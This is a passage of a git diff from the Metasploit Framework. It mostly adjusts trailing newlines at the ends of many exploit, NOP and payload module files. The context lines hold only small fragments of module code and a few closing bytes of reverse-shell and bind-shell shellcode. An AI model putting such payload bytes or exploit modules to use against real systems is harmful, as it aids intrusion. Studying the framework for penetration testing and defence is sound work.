b/modules/exploits/windows/misc/ib_isc_create_database.rb @@ -177,6 +177,4 @@ class Metasploit3 < Msf::Exploit::Remote end -end - - +end \ No newline at end of file diff --git a/modules/exploits/windows/misc/ib_svc_attach.rb b/modules/exploits/windows/misc/ib_svc_attach.rb index abf4574d43..9c207f4309 100644 --- a/modules/exploits/windows/misc/ib_svc_attach.rb +++ b/modules/exploits/windows/misc/ib_svc_attach.rb @@ -183,6 +183,4 @@ class Metasploit3 < Msf::Exploit::Remote end -end - - +end \ No newline at end of file diff --git a/modules/exploits/windows/misc/landesk_aolnsrvr.rb b/modules/exploits/windows/misc/landesk_aolnsrvr.rb index 97bebc0930..c5e83e01c5 100644 --- a/modules/exploits/windows/misc/landesk_aolnsrvr.rb +++ b/modules/exploits/windows/misc/landesk_aolnsrvr.rb @@ -137,5 +137,4 @@ class Metasploit3 < Msf::Exploit::Remote disconnect_udp end -end - +end \ No newline at end of file diff --git a/modules/exploits/windows/misc/mercury_phonebook.rb b/modules/exploits/windows/misc/mercury_phonebook.rb index ebea09869e..76c6efa121 100644 --- a/modules/exploits/windows/misc/mercury_phonebook.rb +++ b/modules/exploits/windows/misc/mercury_phonebook.rb @@ -77,5 +77,4 @@ class Metasploit3 < Msf::Exploit::Remote disconnect end -end - +end \ No newline at end of file diff --git a/modules/exploits/windows/misc/ms07_064_sami.rb b/modules/exploits/windows/misc/ms07_064_sami.rb index 5d4e1c38a9..e7eadc0f83 100644 --- a/modules/exploits/windows/misc/ms07_064_sami.rb +++ b/modules/exploits/windows/misc/ms07_064_sami.rb @@ -90,5 +90,4 @@ class Metasploit3 < Msf::Exploit::Remote service.close_client(client) end -end - +end \ No newline at end of file diff --git a/modules/exploits/windows/misc/netcat110_nt.rb b/modules/exploits/windows/misc/netcat110_nt.rb index ac6d7dc6ad..c15f6657aa 100644 --- a/modules/exploits/windows/misc/netcat110_nt.rb +++ b/modules/exploits/windows/misc/netcat110_nt.rb @@ -75,6 +75,4 @@ class Metasploit3 < Msf::Exploit::Remote handler disconnect end -end - - +end \ No newline at end of file diff --git a/modules/exploits/windows/misc/shixxnote_font.rb b/modules/exploits/windows/misc/shixxnote_font.rb index ca35163396..81ef6c7d8d 100644 --- a/modules/exploits/windows/misc/shixxnote_font.rb +++ b/modules/exploits/windows/misc/shixxnote_font.rb @@ -84,5 +84,4 @@ class Metasploit3 < Msf::Exploit::Remote disconnect end -end - +end \ No newline at end of file diff --git a/modules/exploits/windows/misc/tiny_identd_overflow.rb b/modules/exploits/windows/misc/tiny_identd_overflow.rb index f078748c55..1f503d16db 100644 --- a/modules/exploits/windows/misc/tiny_identd_overflow.rb +++ b/modules/exploits/windows/misc/tiny_identd_overflow.rb @@ -71,5 +71,4 @@ class Metasploit3 < Msf::Exploit::Remote disconnect end -end - +end \ No newline at end of file diff --git a/modules/exploits/windows/misc/windows_rsh.rb b/modules/exploits/windows/misc/windows_rsh.rb index 87c2c5dee8..77d6e3bfff 100644 --- a/modules/exploits/windows/misc/windows_rsh.rb +++ b/modules/exploits/windows/misc/windows_rsh.rb @@ -75,5 +75,4 @@ class Metasploit3 < Msf::Exploit::Remote disconnect end -end - +end \ No newline at end of file diff --git a/modules/exploits/windows/mssql/ms02_039_slammer.rb b/modules/exploits/windows/mssql/ms02_039_slammer.rb index 1debe03afb..20feb7a2ad 100644 --- a/modules/exploits/windows/mssql/ms02_039_slammer.rb +++ b/modules/exploits/windows/mssql/ms02_039_slammer.rb @@ -111,5 +111,4 @@ class Metasploit3 < Msf::Exploit::Remote handler end -end - +end \ No newline at end of file diff --git a/modules/exploits/windows/mssql/ms02_056_hello.rb b/modules/exploits/windows/mssql/ms02_056_hello.rb index 6f2796d8f0..9995c1cbde 100644 --- a/modules/exploits/windows/mssql/ms02_056_hello.rb +++ b/modules/exploits/windows/mssql/ms02_056_hello.rb @@ -96,5 +96,4 @@ class Metasploit3 < Msf::Exploit::Remote disconnect end -end - +end \ No newline at end of file diff --git a/modules/exploits/windows/mysql/mysql_yassl.rb b/modules/exploits/windows/mysql/mysql_yassl.rb index b77dde5066..19ca4696f5 100644 --- a/modules/exploits/windows/mysql/mysql_yassl.rb +++ b/modules/exploits/windows/mysql/mysql_yassl.rb @@ -82,5 +82,4 @@ class Metasploit3 < Msf::Exploit::Remote disconnect end -end - +end \ No newline at end of file diff --git a/modules/exploits/windows/nntp/ms05_030_nntp.rb b/modules/exploits/windows/nntp/ms05_030_nntp.rb index 0ca5e4584c..e46aca5e45 100644 --- a/modules/exploits/windows/nntp/ms05_030_nntp.rb +++ b/modules/exploits/windows/nntp/ms05_030_nntp.rb @@ -83,5 +83,4 @@ class Metasploit3 < Msf::Exploit::Remote service.close_client(client) end -end - +end \ No newline at end of file diff --git a/modules/exploits/windows/novell/groupwisemessenger_client.rb b/modules/exploits/windows/novell/groupwisemessenger_client.rb index 9019a1a7c6..ab3f03f466 100644 --- a/modules/exploits/windows/novell/groupwisemessenger_client.rb +++ b/modules/exploits/windows/novell/groupwisemessenger_client.rb @@ -118,5 +118,4 @@ class Metasploit3 < Msf::Exploit::Remote service.close_client(client) end -end - +end \ No newline at end of file diff --git a/modules/exploits/windows/novell/nmap_stor.rb b/modules/exploits/windows/novell/nmap_stor.rb index 1e98a3b79e..464aeea525 100644 --- a/modules/exploits/windows/novell/nmap_stor.rb +++ b/modules/exploits/windows/novell/nmap_stor.rb @@ -66,5 +66,4 @@ class Metasploit3 < Msf::Exploit::Remote handler disconnect end -end - +end \ No newline at end of file diff --git a/modules/exploits/windows/novell/zenworks_desktop_agent.rb b/modules/exploits/windows/novell/zenworks_desktop_agent.rb index 1091cae534..08e791248d 100644 --- a/modules/exploits/windows/novell/zenworks_desktop_agent.rb +++ b/modules/exploits/windows/novell/zenworks_desktop_agent.rb @@ -93,5 +93,4 @@ class Metasploit3 < Msf::Exploit::Remote disconnect end -end - +end \ No newline at end of file diff --git a/modules/exploits/windows/pop3/seattlelab_pass.rb b/modules/exploits/windows/pop3/seattlelab_pass.rb index fc3484920a..ea8a060e66 100644 --- a/modules/exploits/windows/pop3/seattlelab_pass.rb +++ b/modules/exploits/windows/pop3/seattlelab_pass.rb @@ -116,5 +116,4 @@ class Metasploit3 < Msf::Exploit::Remote disconnect end -end - +end \ No newline at end of file diff --git a/modules/exploits/windows/proxy/bluecoat_winproxy_host.rb b/modules/exploits/windows/proxy/bluecoat_winproxy_host.rb index 4da556dde1..25d258dbc2 100755 --- a/modules/exploits/windows/proxy/bluecoat_winproxy_host.rb +++ b/modules/exploits/windows/proxy/bluecoat_winproxy_host.rb @@ -84,5 +84,4 @@ class Metasploit3 < Msf::Exploit::Remote disconnect end -end - +end \ No newline at end of file diff --git a/modules/exploits/windows/proxy/ccproxy_telnet_ping.rb b/modules/exploits/windows/proxy/ccproxy_telnet_ping.rb index f56f5c13f2..0915f56cc4 100644 --- a/modules/exploits/windows/proxy/ccproxy_telnet_ping.rb +++ b/modules/exploits/windows/proxy/ccproxy_telnet_ping.rb @@ -88,5 +88,4 @@ class Metasploit3 < Msf::Exploit::Remote disconnect end -end - +end \ No newline at end of file diff --git a/modules/exploits/windows/proxy/proxypro_http_get.rb b/modules/exploits/windows/proxy/proxypro_http_get.rb index 1a5e6f3f27..5a5bb959dc 100644 --- a/modules/exploits/windows/proxy/proxypro_http_get.rb +++ b/modules/exploits/windows/proxy/proxypro_http_get.rb @@ -79,5 +79,4 @@ class Metasploit3 < Msf::Exploit::Remote disconnect end -end - +end \ No newline at end of file diff --git a/modules/exploits/windows/scada/realwin.rb b/modules/exploits/windows/scada/realwin.rb index 4935d05c04..6f51993570 100644 --- a/modules/exploits/windows/scada/realwin.rb +++ b/modules/exploits/windows/scada/realwin.rb @@ -74,5 +74,4 @@ class Metasploit3 < Msf::Exploit::Remote disconnect end -end - +end \ No newline at end of file diff --git a/modules/exploits/windows/sip/aim_triton_cseq.rb b/modules/exploits/windows/sip/aim_triton_cseq.rb index a32f7cc799..e87b49c24c 100644 --- a/modules/exploits/windows/sip/aim_triton_cseq.rb +++ b/modules/exploits/windows/sip/aim_triton_cseq.rb @@ -88,5 +88,4 @@ class Metasploit3 < Msf::Exploit::Remote end -end - +end \ No newline at end of file diff --git a/modules/exploits/windows/sip/sipxezphone_cseq.rb b/modules/exploits/windows/sip/sipxezphone_cseq.rb index 9dbfa4bed5..dca214abf9 100644 --- a/modules/exploits/windows/sip/sipxezphone_cseq.rb +++ b/modules/exploits/windows/sip/sipxezphone_cseq.rb @@ -90,5 +90,4 @@ class Metasploit3 < Msf::Exploit::Remote disconnect_udp end -end - +end \ No newline at end of file diff --git a/modules/exploits/windows/sip/sipxphone_cseq.rb b/modules/exploits/windows/sip/sipxphone_cseq.rb index 5918d3c572..fe4761b63f 100644 --- a/modules/exploits/windows/sip/sipxphone_cseq.rb +++ b/modules/exploits/windows/sip/sipxphone_cseq.rb @@ -88,5 +88,4 @@ class Metasploit3 < Msf::Exploit::Remote end -end - +end \ No newline at end of file diff --git a/modules/exploits/windows/smb/ms03_049_netapi.rb b/modules/exploits/windows/smb/ms03_049_netapi.rb index 11a916f863..145c8e280e 100644 --- a/modules/exploits/windows/smb/ms03_049_netapi.rb +++ b/modules/exploits/windows/smb/ms03_049_netapi.rb @@ -119,5 +119,4 @@ class Metasploit3 < Msf::Exploit::Remote disconnect end -end - +end \ No newline at end of file diff --git a/modules/exploits/windows/smb/ms04_007_killbill.rb b/modules/exploits/windows/smb/ms04_007_killbill.rb index 01a032eca7..4d90a8430e 100644 --- a/modules/exploits/windows/smb/ms04_007_killbill.rb +++ b/modules/exploits/windows/smb/ms04_007_killbill.rb @@ -258,5 +258,4 @@ class Metasploit3 < Msf::Exploit::Remote return token end -end - +end \ No newline at end of file diff --git a/modules/exploits/windows/smb/ms04_011_lsass.rb b/modules/exploits/windows/smb/ms04_011_lsass.rb index 70ad1f4405..70df20b4b8 100644 --- a/modules/exploits/windows/smb/ms04_011_lsass.rb +++ b/modules/exploits/windows/smb/ms04_011_lsass.rb @@ -164,6 +164,4 @@ class Metasploit3 < Msf::Exploit::Remote # Perform any required client-side payload handling handler end -end - - +end \ No newline at end of file diff --git a/modules/exploits/windows/smb/ms04_031_netdde.rb b/modules/exploits/windows/smb/ms04_031_netdde.rb index 34adbf2ade..6ccc1c4951 100644 --- a/modules/exploits/windows/smb/ms04_031_netdde.rb +++ b/modules/exploits/windows/smb/ms04_031_netdde.rb @@ -95,5 +95,4 @@ class Metasploit3 < Msf::Exploit::Remote disconnect end -end - +end \ No newline at end of file diff --git a/modules/exploits/windows/smb/ms05_039_pnp.rb b/modules/exploits/windows/smb/ms05_039_pnp.rb index 4516683e4a..1e60048b30 100644 --- a/modules/exploits/windows/smb/ms05_039_pnp.rb +++ b/modules/exploits/windows/smb/ms05_039_pnp.rb @@ -211,5 +211,4 @@ class Metasploit3 < Msf::Exploit::Remote pnp_probe(buf, pipe) end -end - +end \ No newline at end of file diff --git a/modules/exploits/windows/smb/ms06_025_rasmans_reg.rb b/modules/exploits/windows/smb/ms06_025_rasmans_reg.rb index 783644cf3d..6b96d87321 100644 --- a/modules/exploits/windows/smb/ms06_025_rasmans_reg.rb +++ b/modules/exploits/windows/smb/ms06_025_rasmans_reg.rb @@ -180,5 +180,4 @@ class Metasploit3 < Msf::Exploit::Remote disconnect end -end - +end \ No newline at end of file diff --git a/modules/exploits/windows/smb/ms06_025_rras.rb b/modules/exploits/windows/smb/ms06_025_rras.rb index 58be753c84..bc521f3105 100644 --- a/modules/exploits/windows/smb/ms06_025_rras.rb +++ b/modules/exploits/windows/smb/ms06_025_rras.rb @@ -135,5 +135,4 @@ class Metasploit3 < Msf::Exploit::Remote disconnect end -end - +end \ No newline at end of file diff --git a/modules/exploits/windows/smb/ms06_040_netapi.rb b/modules/exploits/windows/smb/ms06_040_netapi.rb index 1d9f9d534e..8420d150af 100644 --- a/modules/exploits/windows/smb/ms06_040_netapi.rb +++ b/modules/exploits/windows/smb/ms06_040_netapi.rb @@ -313,5 +313,4 @@ class Metasploit3 < Msf::Exploit::Remote disconnect end -end - +end \ No newline at end of file diff --git a/modules/exploits/windows/smb/ms06_066_nwapi.rb b/modules/exploits/windows/smb/ms06_066_nwapi.rb index bd4aff8902..bd18534407 100644 --- a/modules/exploits/windows/smb/ms06_066_nwapi.rb +++ b/modules/exploits/windows/smb/ms06_066_nwapi.rb @@ -147,5 +147,4 @@ class Metasploit3 < Msf::Exploit::Remote end end -end - +end \ No newline at end of file diff --git a/modules/exploits/windows/smb/ms06_066_nwwks.rb b/modules/exploits/windows/smb/ms06_066_nwwks.rb index cca04b89cd..8aa23160c3 100644 --- a/modules/exploits/windows/smb/ms06_066_nwwks.rb +++ b/modules/exploits/windows/smb/ms06_066_nwwks.rb @@ -131,5 +131,4 @@ class Metasploit3 < Msf::Exploit::Remote end end -end - +end \ No newline at end of file diff --git a/modules/exploits/windows/smb/msdns_zonename.rb b/modules/exploits/windows/smb/msdns_zonename.rb index 306a5f99a6..79d90843f3 100644 --- a/modules/exploits/windows/smb/msdns_zonename.rb +++ b/modules/exploits/windows/smb/msdns_zonename.rb @@ -273,5 +273,4 @@ class Metasploit3 < Msf::Exploit::Remote disconnect end -end - +end \ No newline at end of file diff --git a/modules/exploits/windows/smb/psexec.rb b/modules/exploits/windows/smb/psexec.rb index a24e468bdb..67ac46077a 100644 --- a/modules/exploits/windows/smb/psexec.rb +++ b/modules/exploits/windows/smb/psexec.rb @@ -278,5 +278,4 @@ class Metasploit3 < Msf::Exploit::Remote disconnect end -end - +end \ No newline at end of file diff --git a/modules/exploits/windows/smb/smb_relay.rb b/modules/exploits/windows/smb/smb_relay.rb index 989e41c10b..a15561e107 100644 --- a/modules/exploits/windows/smb/smb_relay.rb +++ b/modules/exploits/windows/smb/smb_relay.rb @@ -494,6 +494,4 @@ class Metasploit3 < Msf::Exploit::Remote c.put(pkt.to_s) end -end - - +end \ No newline at end of file diff --git a/modules/exploits/windows/smtp/mailcarrier_smtp_ehlo.rb b/modules/exploits/windows/smtp/mailcarrier_smtp_ehlo.rb index e95342c3a0..c74dfc8e5b 100644 --- a/modules/exploits/windows/smtp/mailcarrier_smtp_ehlo.rb +++ b/modules/exploits/windows/smtp/mailcarrier_smtp_ehlo.rb @@ -85,5 +85,4 @@ class Metasploit3 < Msf::Exploit::Remote disconnect end -end - +end \ No newline at end of file diff --git a/modules/exploits/windows/smtp/mercury_cram_md5.rb b/modules/exploits/windows/smtp/mercury_cram_md5.rb index 9194cfd026..8221ee8861 100644 --- a/modules/exploits/windows/smtp/mercury_cram_md5.rb +++ b/modules/exploits/windows/smtp/mercury_cram_md5.rb @@ -80,5 +80,4 @@ class Metasploit3 < Msf::Exploit::Remote disconnect end -end - +end \ No newline at end of file diff --git a/modules/exploits/windows/smtp/wmailserver.rb b/modules/exploits/windows/smtp/wmailserver.rb index 0555b594be..aecc383a97 100644 --- a/modules/exploits/windows/smtp/wmailserver.rb +++ b/modules/exploits/windows/smtp/wmailserver.rb @@ -69,5 +69,4 @@ class Metasploit3 < Msf::Exploit::Remote disconnect end -end - +end \ No newline at end of file diff --git a/modules/exploits/windows/smtp/ypops_overflow1.rb b/modules/exploits/windows/smtp/ypops_overflow1.rb index f1905dfa5a..cf53fbd299 100644 --- a/modules/exploits/windows/smtp/ypops_overflow1.rb +++ b/modules/exploits/windows/smtp/ypops_overflow1.rb @@ -98,5 +98,4 @@ class Metasploit3 < Msf::Exploit::Remote disconnect end -end - +end \ No newline at end of file diff --git a/modules/exploits/windows/ssh/freesshd_key_exchange.rb b/modules/exploits/windows/ssh/freesshd_key_exchange.rb index 1593080f15..39d7ab955e 100644 --- a/modules/exploits/windows/ssh/freesshd_key_exchange.rb +++ b/modules/exploits/windows/ssh/freesshd_key_exchange.rb @@ -82,5 +82,4 @@ class Metasploit3 < Msf::Exploit::Remote disconnect end -end - +end \ No newline at end of file diff --git a/modules/exploits/windows/ssh/putty_msg_debug.rb b/modules/exploits/windows/ssh/putty_msg_debug.rb index c8e0c0c6c2..5c01aa94a4 100644 --- a/modules/exploits/windows/ssh/putty_msg_debug.rb +++ b/modules/exploits/windows/ssh/putty_msg_debug.rb @@ -84,6 +84,4 @@ class Metasploit3 < Msf::Exploit::Remote service.close_client(client) end -end - - +end \ No newline at end of file diff --git a/modules/exploits/windows/ssh/securecrt_ssh1.rb b/modules/exploits/windows/ssh/securecrt_ssh1.rb index 514cca78b3..c5643b0d85 100644 --- a/modules/exploits/windows/ssh/securecrt_ssh1.rb +++ b/modules/exploits/windows/ssh/securecrt_ssh1.rb @@ -74,6 +74,4 @@ class Metasploit3 < Msf::Exploit::Remote service.close_client(client) end -end - - +end \ No newline at end of file diff --git a/modules/exploits/windows/ssl/ms04_011_pct.rb b/modules/exploits/windows/ssl/ms04_011_pct.rb index f1a8213281..2e6cd5038f 100644 --- a/modules/exploits/windows/ssl/ms04_011_pct.rb +++ b/modules/exploits/windows/ssl/ms04_011_pct.rb @@ -167,5 +167,4 @@ class Metasploit3 < Msf::Exploit::Remote disconnect end -end - +end \ No newline at end of file diff --git a/modules/exploits/windows/telnet/gamsoft_telsrv_username.rb b/modules/exploits/windows/telnet/gamsoft_telsrv_username.rb index c131be2274..124b193d7d 100644 --- a/modules/exploits/windows/telnet/gamsoft_telsrv_username.rb +++ b/modules/exploits/windows/telnet/gamsoft_telsrv_username.rb @@ -117,6 +117,4 @@ class Metasploit3 < Msf::Exploit::Remote disconnect end -end - - +end \ No newline at end of file diff --git a/modules/exploits/windows/telnet/goodtech_telnet.rb b/modules/exploits/windows/telnet/goodtech_telnet.rb index 8c990ae5ea..43c3c3261b 100644 --- a/modules/exploits/windows/telnet/goodtech_telnet.rb +++ b/modules/exploits/windows/telnet/goodtech_telnet.rb @@ -73,5 +73,4 @@ class Metasploit3 < Msf::Exploit::Remote disconnect end -end - +end \ No newline at end of file diff --git a/modules/exploits/windows/tftp/attftp_long_filename.rb b/modules/exploits/windows/tftp/attftp_long_filename.rb index fbc15a58f9..457393ee28 100644 --- a/modules/exploits/windows/tftp/attftp_long_filename.rb +++ b/modules/exploits/windows/tftp/attftp_long_filename.rb @@ -85,5 +85,4 @@ class Metasploit3 < Msf::Exploit::Remote disconnect_udp end -end - +end \ No newline at end of file diff --git a/modules/exploits/windows/tftp/futuresoft_transfermode.rb b/modules/exploits/windows/tftp/futuresoft_transfermode.rb index 699807d2a7..0a706df2ae 100644 --- a/modules/exploits/windows/tftp/futuresoft_transfermode.rb +++ b/modules/exploits/windows/tftp/futuresoft_transfermode.rb @@ -90,5 +90,4 @@ class Metasploit3 < Msf::Exploit::Remote disconnect_udp end -end - +end \ No newline at end of file diff --git a/modules/exploits/windows/tftp/quick_tftp_pro_mode.rb b/modules/exploits/windows/tftp/quick_tftp_pro_mode.rb index 47d63d1a7e..76a8b490fa 100644 --- a/modules/exploits/windows/tftp/quick_tftp_pro_mode.rb +++ b/modules/exploits/windows/tftp/quick_tftp_pro_mode.rb @@ -69,4 +69,4 @@ class Metasploit3 < Msf::Exploit::Remote disconnect_udp end -end +end \ No newline at end of file diff --git a/modules/exploits/windows/tftp/tftpd32_long_filename.rb b/modules/exploits/windows/tftp/tftpd32_long_filename.rb index 5e594260dd..c26b21ed19 100644 --- a/modules/exploits/windows/tftp/tftpd32_long_filename.rb +++ b/modules/exploits/windows/tftp/tftpd32_long_filename.rb @@ -84,5 +84,4 @@ class Metasploit3 < Msf::Exploit::Remote disconnect_udp end -end - +end \ No newline at end of file diff --git a/modules/exploits/windows/tftp/tftpdwin_long_filename.rb b/modules/exploits/windows/tftp/tftpdwin_long_filename.rb index 24fd2b176f..e5e7a338c4 100644 --- a/modules/exploits/windows/tftp/tftpdwin_long_filename.rb +++ b/modules/exploits/windows/tftp/tftpdwin_long_filename.rb @@ -70,5 +70,4 @@ class Metasploit3 < Msf::Exploit::Remote disconnect_udp end -end - +end \ No newline at end of file diff --git a/modules/exploits/windows/tftp/threectftpsvc_long_mode.rb b/modules/exploits/windows/tftp/threectftpsvc_long_mode.rb index b392320636..8dc91e6067 100644 --- a/modules/exploits/windows/tftp/threectftpsvc_long_mode.rb +++ b/modules/exploits/windows/tftp/threectftpsvc_long_mode.rb @@ -69,5 +69,4 @@ class Metasploit3 < Msf::Exploit::Remote disconnect_udp end -end - +end \ No newline at end of file diff --git a/modules/exploits/windows/unicenter/cam_log_security.rb b/modules/exploits/windows/unicenter/cam_log_security.rb index f7ad917b8b..92ca72acab 100644 --- a/modules/exploits/windows/unicenter/cam_log_security.rb +++ b/modules/exploits/windows/unicenter/cam_log_security.rb @@ -87,5 +87,4 @@ class Metasploit3 < Msf::Exploit::Remote disconnect end -end - +end \ No newline at end of file diff --git a/modules/exploits/windows/vnc/realvnc_client.rb b/modules/exploits/windows/vnc/realvnc_client.rb index dc92d39a6d..d098c2f61a 100644 --- a/modules/exploits/windows/vnc/realvnc_client.rb +++ b/modules/exploits/windows/vnc/realvnc_client.rb @@ -80,5 +80,4 @@ class Metasploit3 < Msf::Exploit::Remote service.close_client(client) end -end - +end \ No newline at end of file diff --git a/modules/exploits/windows/vnc/ultravnc_client.rb b/modules/exploits/windows/vnc/ultravnc_client.rb index 98ba26ac64..f9e6651159 100644 --- a/modules/exploits/windows/vnc/ultravnc_client.rb +++ b/modules/exploits/windows/vnc/ultravnc_client.rb @@ -81,5 +81,4 @@ class Metasploit3 < Msf::Exploit::Remote service.close_client(client) end -end - +end \ No newline at end of file diff --git a/modules/exploits/windows/vnc/winvnc_http_get.rb b/modules/exploits/windows/vnc/winvnc_http_get.rb index c8a12a7ac2..b4a0423f71 100755 --- a/modules/exploits/windows/vnc/winvnc_http_get.rb +++ b/modules/exploits/windows/vnc/winvnc_http_get.rb @@ -75,6 +75,4 @@ require 'msf/core' end -end - - +end \ No newline at end of file diff --git a/modules/exploits/windows/wins/ms04_045_wins.rb b/modules/exploits/windows/wins/ms04_045_wins.rb index ee14b8b0b3..c0ba7e3911 100644 --- a/modules/exploits/windows/wins/ms04_045_wins.rb +++ b/modules/exploits/windows/wins/ms04_045_wins.rb @@ -209,5 +209,4 @@ class Metasploit3 < Msf::Exploit::Remote return ret end -end - +end \ No newline at end of file diff --git a/modules/modules.rb.ts.rb b/modules/modules.rb.ts.rb index 027c4cd466..7d6367121f 100644 --- a/modules/modules.rb.ts.rb +++ b/modules/modules.rb.ts.rb @@ -23,4 +23,4 @@ class Rex::TestSuite return suite; end -end +end \ No newline at end of file diff --git a/modules/nops/armle/simple.rb b/modules/nops/armle/simple.rb index 241367099f..502c3216ac 100644 --- a/modules/nops/armle/simple.rb +++ b/modules/nops/armle/simple.rb @@ -67,6 +67,4 @@ class Metasploit3 < Msf::Nop return (nops[0].pack("V*") * (length/4)) end -end - - +end \ No newline at end of file diff --git a/modules/nops/nop_test.rb.ut.rb b/modules/nops/nop_test.rb.ut.rb index 31b17b4c51..fa21c2310b 100644 --- a/modules/nops/nop_test.rb.ut.rb +++ b/modules/nops/nop_test.rb.ut.rb @@ -48,4 +48,4 @@ $framework.nops.each_module { |name, mod| $stderr.puts("#{name.ljust(25)}: Passed: #{passed}, Failed: #{failed}, Unique: #{h.keys.length}") -} +} \ No newline at end of file diff --git a/modules/nops/php/generic.rb b/modules/nops/php/generic.rb index 274f13ba43..e88df56322 100644 --- a/modules/nops/php/generic.rb +++ b/modules/nops/php/generic.rb @@ -37,6 +37,4 @@ class Metasploit3 < Msf::Nop " " * length end -end - - +end \ No newline at end of file diff --git a/modules/nops/ppc/simple.rb b/modules/nops/ppc/simple.rb index 650c1484c4..77251e1bf1 100644 --- a/modules/nops/ppc/simple.rb +++ b/modules/nops/ppc/simple.rb @@ -69,6 +69,4 @@ class Metasploit3 < Msf::Nop return ("\x60" * length)[0, length] end -end - - +end \ No newline at end of file diff --git a/modules/nops/sparc/random.rb b/modules/nops/sparc/random.rb index aebdc70cc8..97a74e5815 100644 --- a/modules/nops/sparc/random.rb +++ b/modules/nops/sparc/random.rb @@ -215,6 +215,4 @@ class Metasploit3 < Msf::Nop ].pack('N') end -end - - +end \ No newline at end of file diff --git a/modules/nops/x86/opty2.rb b/modules/nops/x86/opty2.rb index 6971872fe5..96b6cc146c 100644 --- a/modules/nops/x86/opty2.rb +++ b/modules/nops/x86/opty2.rb @@ -43,6 +43,4 @@ class Metasploit3 < Msf::Nop opty.generate_sled(length) end -end - - +end \ No newline at end of file diff --git a/modules/nops/x86/single_byte.rb b/modules/nops/x86/single_byte.rb index 11cb2659ac..9076c03e5f 100644 --- a/modules/nops/x86/single_byte.rb +++ b/modules/nops/x86/single_byte.rb @@ -152,6 +152,4 @@ SINGLE_BYTE_SLED = return out_sled end -end - - +end \ No newline at end of file diff --git a/modules/payloads/singles/aix/power/shell_bind_tcp.rb b/modules/payloads/singles/aix/power/shell_bind_tcp.rb index b66aedf148..b5e083b686 100644 --- a/modules/payloads/singles/aix/power/shell_bind_tcp.rb +++ b/modules/payloads/singles/aix/power/shell_bind_tcp.rb @@ -157,6 +157,4 @@ module Metasploit3 end -end - - +end \ No newline at end of file diff --git a/modules/payloads/singles/aix/power/shell_find_port.rb b/modules/payloads/singles/aix/power/shell_find_port.rb index 1d669dff08..d2f001b1e3 100644 --- a/modules/payloads/singles/aix/power/shell_find_port.rb +++ b/modules/payloads/singles/aix/power/shell_find_port.rb @@ -131,6 +131,4 @@ module Metasploit3 end -end - - +end \ No newline at end of file diff --git a/modules/payloads/singles/aix/power/shell_reverse_tcp.rb b/modules/payloads/singles/aix/power/shell_reverse_tcp.rb index 5ef2ef85aa..22782c40c5 100644 --- a/modules/payloads/singles/aix/power/shell_reverse_tcp.rb +++ b/modules/payloads/singles/aix/power/shell_reverse_tcp.rb @@ -133,6 +133,4 @@ module Metasploit3 end -end - - +end \ No newline at end of file diff --git a/modules/payloads/singles/bsd/sparc/shell_bind_tcp.rb b/modules/payloads/singles/bsd/sparc/shell_bind_tcp.rb index 597f24d726..46d8dcf911 100644 --- a/modules/payloads/singles/bsd/sparc/shell_bind_tcp.rb +++ b/modules/payloads/singles/bsd/sparc/shell_bind_tcp.rb @@ -50,6 +50,4 @@ module Metasploit3 "\x91\xd0\x20\x08" end -end - - +end \ No newline at end of file diff --git a/modules/payloads/singles/bsd/sparc/shell_reverse_tcp.rb b/modules/payloads/singles/bsd/sparc/shell_reverse_tcp.rb index f071edbfc8..5e19dbec8e 100644 --- a/modules/payloads/singles/bsd/sparc/shell_reverse_tcp.rb +++ b/modules/payloads/singles/bsd/sparc/shell_reverse_tcp.rb @@ -51,6 +51,4 @@ module Metasploit3 "\xd0\x23\xbf\xf8\xc0\x23\xbf\xfc\x82\x10\x20\x3b\x91\xd0\x20\x08" end -end - - +end \ No newline at end of file diff --git a/modules/payloads/singles/bsd/x86/exec.rb b/modules/payloads/singles/bsd/x86/exec.rb index f1a5e5638b..d35319a653 100644 --- a/modules/payloads/singles/bsd/x86/exec.rb +++ b/modules/payloads/singles/bsd/x86/exec.rb @@ -56,6 +56,4 @@ module Metasploit3 "\x57\x53\x89\xe1\x52\x51\x53\x50\xcd\x80" end -end - - +end \ No newline at end of file diff --git a/modules/payloads/singles/bsd/x86/shell_bind_tcp.rb b/modules/payloads/singles/bsd/x86/shell_bind_tcp.rb index e032c96f9c..2070f5b3d9 100644 --- a/modules/payloads/singles/bsd/x86/shell_bind_tcp.rb +++ b/modules/payloads/singles/bsd/x86/shell_bind_tcp.rb @@ -80,6 +80,4 @@ module Metasploit3 )) end -end - - +end \ No newline at end of file diff --git a/modules/payloads/singles/bsd/x86/shell_find_port.rb b/modules/payloads/singles/bsd/x86/shell_find_port.rb index f41a9f2476..8cb142178e 100644 --- a/modules/payloads/singles/bsd/x86/shell_find_port.rb +++ b/modules/payloads/singles/bsd/x86/shell_find_port.rb @@ -75,6 +75,4 @@ module Metasploit3 )) end -end - - +end \ No newline at end of file diff --git a/modules/payloads/singles/bsd/x86/shell_find_tag.rb b/modules/payloads/singles/bsd/x86/shell_find_tag.rb index 446b3fe081..e08aab29c8 100644 --- a/modules/payloads/singles/bsd/x86/shell_find_tag.rb +++ b/modules/payloads/singles/bsd/x86/shell_find_tag.rb @@ -56,6 +56,4 @@ module Metasploit3 super end -end - - +end \ No newline at end of file diff --git a/modules/payloads/singles/bsd/x86/shell_reverse_tcp.rb b/modules/payloads/singles/bsd/x86/shell_reverse_tcp.rb index 3292a7a2a1..2d6aa0c226 100644 --- a/modules/payloads/singles/bsd/x86/shell_reverse_tcp.rb +++ b/modules/payloads/singles/bsd/x86/shell_reverse_tcp.rb @@ -74,6 +74,4 @@ module Metasploit3 )) end -end - - +end \ No newline at end of file diff --git a/modules/payloads/singles/bsdi/x86/shell_bind_tcp.rb b/modules/payloads/singles/bsdi/x86/shell_bind_tcp.rb index 33072b7519..8a85aadcb0 100644 --- a/modules/payloads/singles/bsdi/x86/shell_bind_tcp.rb +++ b/modules/payloads/singles/bsdi/x86/shell_bind_tcp.rb @@ -47,6 +47,4 @@ module Metasploit3 )) end -end - - +end \ No newline at end of file diff --git a/modules/payloads/singles/bsdi/x86/shell_find_port.rb b/modules/payloads/singles/bsdi/x86/shell_find_port.rb index 7815af0d96..bf9c5c2339 100644 --- a/modules/payloads/singles/bsdi/x86/shell_find_port.rb +++ b/modules/payloads/singles/bsdi/x86/shell_find_port.rb @@ -46,6 +46,4 @@ module Metasploit3 )) end -end - - +end \ No newline at end of file diff --git a/modules/payloads/singles/bsdi/x86/shell_reverse_tcp.rb b/modules/payloads/singles/bsdi/x86/shell_reverse_tcp.rb index 853732f92a..df4a58e58b 100644 --- a/modules/payloads/singles/bsdi/x86/shell_reverse_tcp.rb +++ b/modules/payloads/singles/bsdi/x86/shell_reverse_tcp.rb @@ -47,6 +47,4 